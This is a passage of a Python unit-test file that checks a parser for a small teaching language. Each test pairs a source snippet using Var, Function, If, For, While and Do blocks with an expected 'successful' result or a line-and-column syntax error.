self.assertTrue(TestParser.checkParser(input,expect,203))\n\n def test_composite_init_declare(self):\n input=\"\"\"Var: a,b[3]={1,2,3};\n Function: main\n Body:\n Return;\n EndBody.\"\"\"\n expect= \"successful\"\n self.assertTrue(TestParser.checkParser(input,expect,204))\n\n def test_both_init_declare(self):\n input=\"\"\"Var: a,b=1,c[3]={1,2,3};\n Function: main\n Body:\n Return;\n EndBody.\"\"\"\n expect= \"successful\"\n self.assertTrue(TestParser.checkParser(input,expect,205))\n\n def test_complicated_composite_declare(self):\n input=\"\"\"Var: b[2][3]={{1,2},{3,4}};\n Function: main\n Body:\n Return;\n EndBody.\"\"\"\n expect= \"successful\"\n self.assertTrue(TestParser.checkParser(input,expect,206))\n\n def test_simple_prog(self):\n input=\"\"\"Var: x;\n Function: fact\n Parameter: n\n Body:\n If n == 0 Then\n Return 1;\n Else\n Return n * fact(n-1);\n EndIf.\n EndBody.\n Function: main\n ** this is a comment **\n Body:\n x = 10;\n fact (x);\n EndBody.\"\"\"\n expect= \"successful\"\n self.assertTrue(TestParser.checkParser(input,expect,207)) \n \n def test_composite_declare(self):\n input=\"\"\"Var: x, y[1][3]={{{12,1}, {12., 12e3}},{23}, {13,32}};\n Function: fact\n Parameter: n\n Body:\n If n == 0 Then\n Return 1;\n Else\n Return n * fact(n-1);\n EndIf.\n EndBody.\n Function: main\n ** this is a comment **\n Body:\n x = 10;\n fact (x);\n EndBody.\"\"\"\n expect=\"successful\"\n self.assertTrue(TestParser.checkParser(input, expect, 208))\n\n def test_unterminated_comment(self):\n input=\"\"\"Var: x, y[1][3]={{{12,1}, {12., 12e3}},{23}, {13,32}};\n Function: fact\n Parameter: n\n Body:\n a = a < b;\n If n == 0 Then\n Return 1;\n Else\n Return n * fact(n-1);\n EndIf.\n EndBody.\n Function: main\n Body:\n x = \"\"10;\n fact (x);\n EndBody.\"\"\"\n expect=\"Error on line 14 col 18: 10\"\n self.assertTrue(TestParser.checkParser(input, expect, 209))\n def test_non_body_func(self):\n input=\"\"\"Function: main\"\"\"\n expect=\"\"\"Error on line 1 col 14: <EOF>\"\"\"\n num=210\n self.assertTrue(TestParser.checkParser(input, expect, num))\n def test_test_nonsemi_stmt(self):\n input=\"\"\"Function: main\nVar: a\nBody:Var\na=1\nEndBody.\"\"\"\n expect=\"\"\"Error on line 2 col 0: Var\"\"\"\n num=211\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n\n def test_non_func_prog(self):\n input=\"\"\"Var: a,b,c;\"\"\"\n expect=\"\"\"successful\"\"\"\n num=212\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_invalid_expr(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n a = a <b;\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=213\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n\n def test_khang_testcase(self):\n input=\"\"\"Var: x = \"yay\";\"\"\"\n expect=\"\"\"successful\"\"\"\n num=214\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_invalid_bool_expr(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n a = a <b < c;\n EndBody.\"\"\"\n expect=\"\"\"Error on line 4 col 17: <\"\"\"\n num=215\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_if_expr(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n If !(True) Then\n a = a <c;\n If (a + b > c) Then a = a+b; ElseIf a == b Then writeln(i); Else a = 12.e1; EndIf.\n EndIf.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=216\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_var_decl_stmt(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n Var: x=1,a[1]=1;\n Var: a,b[1]={\"this\"};\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=217\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_params_1(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]=1;\n Var: a,b[1]={\"this\"};\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=218\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_params_2(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a, b[1]\n Body:\n Var: x=1,a[1]=1;\n Var: a,b[1]={\"this\"};\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=219\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_params_3(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a, b[1];\n Body:\n Var: x=1,a[1]=1;\n Var: a,b[1]={\"this\"};\n EndBody.\"\"\"\n expect=\"\"\"Error on line 3 col 26: ;\"\"\"\n num=220\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_params_4(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a = 1, b[1]\n Body:\n Var: x=1,a[1]=1;\n Var: a,b[1]={\"this\"};\n EndBody.\"\"\"\n expect=\"\"\"Error on line 3 col 21: =\"\"\"\n num=221\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_params_5(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a, b[1], {12,3}\n Body:\n Var: x=1,a[1]=1;\n Var: a,b[1]={\"this\"};\n EndBody.\"\"\"\n expect=\"\"\"Error on line 3 col 28: {\"\"\"\n num=222\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_params_6(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a + b\n Body:\n Var: x=1,a[1]=1;\n Var: a,b[1]={\"this\"};\n EndBody.\"\"\"\n expect=\"\"\"Error on line 3 col 21: +\"\"\"\n num=223\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_var_decl_not_in_head(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a, b[1]\n Body:\n Var: x=1,a[1]=1;\n If a Then\n EndIf.\n Var: a,b[1]={\"this\"};\n EndBody.\"\"\"\n expect=\"\"\"Error on line 8 col 8: Var\"\"\"\n num=224\n self.assertTrue(TestParser.checkParser(input, expect, num))\n \n def test_params_7(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a;\n Body:\n Var: x=1,a[1]=1;\n Var: a,b[1]={\"this\"};\n EndBody.\"\"\"\n expect=\"\"\"Error on line 3 col 20: ;\"\"\"\n num=225\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_var_decl_2(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},b=a<c;\n Var: a,b[1]={\"this\"};\n EndBody.\"\"\"\n expect=\"\"\"Error on line 5 col 37: a\"\"\"\n num=226\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_var_decl_3(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n Var: a,b[1]={\"this\"};\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=227\n self.assertTrue(TestParser.checkParser(input, expect, num))\n \n def test_var_decl_4(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n If 1 < a Then\n Var: a;\n EndIf.\n Var: a,b[1]={\"this\"};\n EndBody.\"\"\"\n expect=\"\"\"Error on line 9 col 8: Var\"\"\"\n num=228\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_if_stmt_1(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n If 1 + a - b * foo() > 1 Then\n EndIf.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=229\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_if_stmt_2(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n If a == True Then\n EndIf.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=230\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_if_stmt_3(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n If a && True || !b Then\n EndIf.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=231\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_if_stmt_4(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n If a && True || !b Then\n ElseIf something Then\n If something123El_se Then\n EndIf.\n EndIf.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=232\n self.assertTrue(TestParser.checkParser(input, expect, num))\n \n def test_for_stmt_1(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n For something Do something() EndFor.\n EndBody.\"\"\"\n expect=\"\"\"Error on line 6 col 12: something\"\"\"\n num=233\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_for_stmt_2(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n For (i = 1, a < 2, i = i + 1) Do something(); EndFor.\n EndBody.\"\"\"\n expect=\"\"\"Error on line 6 col 29: =\"\"\"\n num=234\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_for_stmt_3(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n For (i = \"abc\", a < 2, i + 1) Do something(); EndFor.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=235\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_for_stmt_4(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n For (i = 0x12, a < 2, i + foo() + 1) Do something(); EndFor.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=236\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_for_stmt_5(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n For (i = 2, a < 2, i + 1) Do \n For (i=2) Do EndFor.\n something(); EndFor.\n EndBody.\"\"\"\n expect=\"\"\"Error on line 7 col 16: )\"\"\"\n num=237\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_for_stmt_6(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n For (i = 0x12, a < 2, i + foo() + 1) Do something();\n c = a[23][b[1][2][c]] +. 12.; \n EndFor.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=238\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_for_stmt_7(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n For (i = 0x12, a < 2, i + foo() + 1) Do something();\n c = a[23][b[1][2][c]] +. 12; \n EndFor.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=239\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_while_stmt_1(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n While statement Do something(); EndWhile.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=240\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_while_stmt_1(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n While 1 Do something(); EndWhile.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=240\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_while_stmt_2(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n While !(x =/= y) Do something(); EndWhile.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=241\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_while_stmt_3(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n While !(x && y || b) ** && (a || abc)** Do something(); EndWhile.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=242\n self.assertTrue(TestParser.checkParser(input, expect, num))\n \n def test_while_stmt_4(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n While !(x && y || b) && (a || abc) Do something(); EndWhile.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=243\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_complicate_bool_expr(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n a = !(x && y || b) && (a || abc);\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=244\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_dowhile_stmt_1(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Do something(); While !(abc < 12 || b && True) EndDo.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=245\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_dowhile_stmt_2(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Do something(); While a[1][c[2]] + 123 -1 EndDo.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=246\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_dowhile_stmt_3(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Do something(); While 1 <. 2.0 EndDo.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=247\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_dowhile_stmt_4(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Do something(); While a && bool_of_string(\"True\") EndDo.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=248\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_dowhile_stmt_5(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Do something(); While a && b <. 1. +. 3. EndDo.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=249\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_wrong_exp(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n If !(True) Then\n a = a <c;\n If (a + b > c) Then a = a+b; ElseIf a == b Then writeln(i); Else a = 12.e; EndIf.\n EndIf.\n EndBody.\"\"\"\n expect=\"\"\"Error on line 6 col 80: e\"\"\"\n num=250\n self.assertTrue(TestParser.checkParser(input, expect, num))\n \n def test_break_continue(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n If !(True) Then\n Break;\n a = a <c;\n If (a + b > c) Then a = a+b; ElseIf a == b Then writeln(i); Else a = 12.e1; EndIf.\n EndIf.\n Continue;\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=251\n self.assertTrue(TestParser.checkParser(input, expect, num))\n \n def test_return_stmt_1(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n If !(True) Then\n \n a = a <c;\n If (a + b > c) Then a = a+b; ElseIf a == b Then writeln(i); Else a = 12.e1; EndIf.\n EndIf.\n Return ;\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=252\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_return_stmt_2(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n If !(True) Then\n \n a = a <c;\n If (a + b > c) Then a = a+b; ElseIf a == b Then writeln(i); Else a = 12.e1; EndIf.\n EndIf.\n Return 1 + 1;\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=253\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_return_stmt_3(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n If !(True) Then\n \n a = a <c;\n If (a + b > c) Then a = a+b; ElseIf a == b Then writeln(i); Else a = 12.e1; EndIf.\n EndIf.\n Return 1 + {{1,2}, \"abnd\"};\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=254\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_return_stmt_4(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n If !(True) Then\n \n a = a <c;\n If (a + b > c) Then a = a+b; ElseIf a == b Then writeln(i); Else a = 12.e1; EndIf.\n EndIf.\n Return (a < 1) || (b >. !c);\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=255\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_return_stmt_5(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n If !(True) Then\n \n a = a <c;\n If (a + b > c) Then a = a+b; ElseIf a == b Then writeln(i); Else a = 12.e1; EndIf.\n EndIf.\n Return a < 1 || foo(arg1, \"arg2\", {1,2});\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=256\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_return_stmt_6(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n If !(True) Then\n \n a = a <c;\n If (a + b > c) Then a = a+b; ElseIf a == b Then writeln(i); Else a = 12.e1; EndIf.\n EndIf.\n Return If a > b Then a + 1 EndIf.;\n EndBody.\"\"\"\n expect=\"\"\"Error on line 9 col 15: If\"\"\"\n num=257\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_call_stmt_1(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n foo(arg1, \"???\", foo(nothing));\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=258\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_call_stmt_2(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n foo(arg1, \"???\", foo(nothing))\n EndBody.\"\"\"\n expect=\"\"\"Error on line 5 col 8: EndBody\"\"\"\n num=259\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_call_stmt_3(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n a = a[c[1][b]][1] + foo(arg1, \"???\", foo(nothing));\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=260\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_call_stmt_4(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n a = a[c[1][b]][1] < foo(arg1, \"???\", foo(nothing));\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=261\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_call_stmt_5(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n foo(arg1, \"???\", foo(nothing)) = something(foo());\n EndBody.\"\"\"\n expect=\"\"\"Error on line 4 col 39: =\"\"\"\n num=262\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_call_stmt_6(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n foo(arg1, \"???\", foo(nothing), {\"asdab\", {1,2.e2,123e1,\"nothing\"}});\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=263\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_call_stmt_7(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n foo(arg1, \"???\", foo(nothing), {\"asdab\", {1,2.e2,123e1,\"nothing\"}});\n printLn();\n print(arg);\n printStrLn(arg);\n read();\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=264\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_call_stmt_8(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n foo(arg1, \"???\", foo(nothing), {\"asda\\\\bb\", {1,2.e2,123e1,\"nothing\"}});\n printLn();\n print(arg);\n printStrLn(arg);\n read();\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=265\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_call_stmt_9(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n foo(arg1, \"???\", foo(nothing), {\"asda\\\\bb\", {1,2.e2,123e1,\"nothing\"}});\n printLn();\n **print(arg);\n printStrLn(arg)**;\n read();\n EndBody.\"\"\"\n expect=\"\"\"Error on line 7 col 25: ;\"\"\"\n num=266\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_call_stmt_10(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n foo(a < b + c);\n printLn();\n **print(arg);\n printStrLn(arg)**;\n read();\n EndBody.\"\"\"\n expect=\"\"\"Error on line 7 col 25: ;\"\"\"\n num=267\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_idx_operator_1(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n a = b[something()[a[1]] + 1 ];\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=268\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_idx_operator_2(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n a = b[something()[a[1]] + 1][c + d < 1];\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=269\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_idx_operator_3(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n a = b[something()[a[1]] + 1][c + d < 1] + c *. d[1][21];\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=270\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_idx_operator_4(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n a = b[something()[a[1]] + 1][c + d < 1] + c *. d[1][21 * 0x21AF];\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=271\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_idx_operator_5(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n a = b[something()[a[1]] + 1][c + d < 1] + c *. d[1.][21 * 0x21Af];\n EndBody.\"\"\"\n expect=\"\"\"Error on line 4 col 71: f\"\"\"\n num=272\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_op_expr_1(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n a = a + b +. a-a-.a*a*.a\\\\b\\\\.b%!c&&a||a==b;\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=273\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_op_expr_2(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n a = (a + b) +. (a-a-.a*a*.a\\\\b\\\\.b%!c&&a||a==b;\n EndBody.\"\"\"\n expect=\"\"\"Error on line 4 col 52: ;\"\"\"\n num=274\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_op_expr_3(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n b = {{{}}};\n a = (a + b) +. (a-a-.a*a*.a\\\\b\\\\.b%!c&&a||a==b);\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=275\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_op_expr_4(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n b = {{{}}};\n a = (a + b) +. (a-a-.a*a*.a\\\\b\\\\.b%!c&&a||a==b) % a[1][1];\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=276\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_function_structure_1(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n Body:\n EndBody.\"\"\"\n expect=\"\"\"Error on line 4 col 8: Body\"\"\"\n num=277\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_function_structure_2(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a < b\n Body:\n Body:\n EndBody.\"\"\"\n expect=\"\"\"Error on line 3 col 21: <\"\"\"\n num=278\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n \n def test_function_structure_3(self):\n input=\"\"\"\n Function: main,fact\n Parameter: a < b\n Body:\n Body:\n EndBody.\"\"\"\n expect=\"\"\"Error on line 2 col 22: ,\"\"\"\n num=279\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_function_structure_4(self):\n input=\"\"\"\n Function: main\n Parameter: a, b[1][100]\n Body:\n While a<b Do\n If a > b Then doNothing(); Break;\n ElseIf !somecon() Then doSomething();\n Else Do something(); While a + foo()[100] EndDo.\n EndIf.\n EndWhile.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=280\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_function_structure_5(self):\n input=\"\"\"\n Function: main\n Parameter: a, b[1][100]\n Body:\n While a<b Do\n If a > b Then doNothing(); Break;\n ElseIf !somecon() Then doSomething();\n Else Do something(); While a + foo()[100] EndDo.\n EndIf.\n EndDo.\n EndBody.\"\"\"\n expect=\"\"\"Error on line 10 col 8: EndDo\"\"\"\n num=281\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_function_structure_6(self):\n input=\"\"\"\n Function: main\n Parameter: a, b[1][100]\n Body:\n While a<b Do\n If a > b Then doNothing(); Break;\n ElseIf !somecon() Then doSomething();\n ElseIf a \\\\ 100 -20 Then Continue;\n stop();\n Else what();\n Else Do something(); While a + foo()[100] EndDo.\n EndIf.\n EndWhile.\n EndBody.\"\"\"\n expect=\"\"\"Error on line 11 col 12: Else\"\"\"\n num=282\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_function_structure_7(self):\n input=\"\"\"\n If a > b Then doNothing(); Break;\n ElseIf !somecon() Then doSomething();\n ElseIf a \\\\ 100 -20 Then Continue;\n stop();\n Else what();\n Else Do something(); While a + foo()[100] EndDo.\n EndIf.\n Function: main\n Parameter: a, b[1][100]\n Body:\n While a<b Do\n EndWhile.\n EndBody.\"\"\"\n expect=\"\"\"Error on line 2 col 8: If\"\"\"\n num=283\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_function_structure_8(self):\n input=\"\"\"\n Function: main_123_main\n Parameter: a, b[1][100]\n Body:\n While a<b Do\n EndWhile.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=284\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_function_structure_9(self):\n input=\"\"\"\n Function: \n Body:\n \n EndBody.\"\"\"\n expect=\"\"\"Error on line 3 col 8: Body\"\"\"\n num=285\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_function_structure_10(self):\n input=\"\"\"\n Function: nothing\n Body:\n Var: a = {1238,32412, 120};\n EndBody.\n Function: foo\n Parameter: a,b,c\n Body:\n nothing(a[1][1][b[k]]);\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=286\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_array_lit_with_expr(self):\n input=\"\"\"\n Function: foo\n Parameter: a,b,c\n Body:\n nothing(a[1][1][b[k]]);\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=287\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_while_stmt_extra(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n While statement something(); EndWhile.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=288\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_while_stmt_extra(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n While statement something(); EndWhile.\n EndBody.\"\"\"\n expect=\"\"\"Error on line 5 col 25: something\"\"\"\n num=288\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_extra_1(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: 12e1,0.001\n Body:\n While statement something(); EndWhile.\n EndBody.\"\"\"\n expect=\"\"\"Error on line 3 col 19: 12e1\"\"\"\n num=289\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_extra_2(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n 1 == 12\n EndBody.\"\"\"\n expect=\"\"\"Error on line 5 col 8: 1\"\"\"\n num=290\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_extra_3(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: a[5] = {1,4,3,2,0};\n Var: b[2][3]={{1,2,3},{4,5,6}};\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=291\n 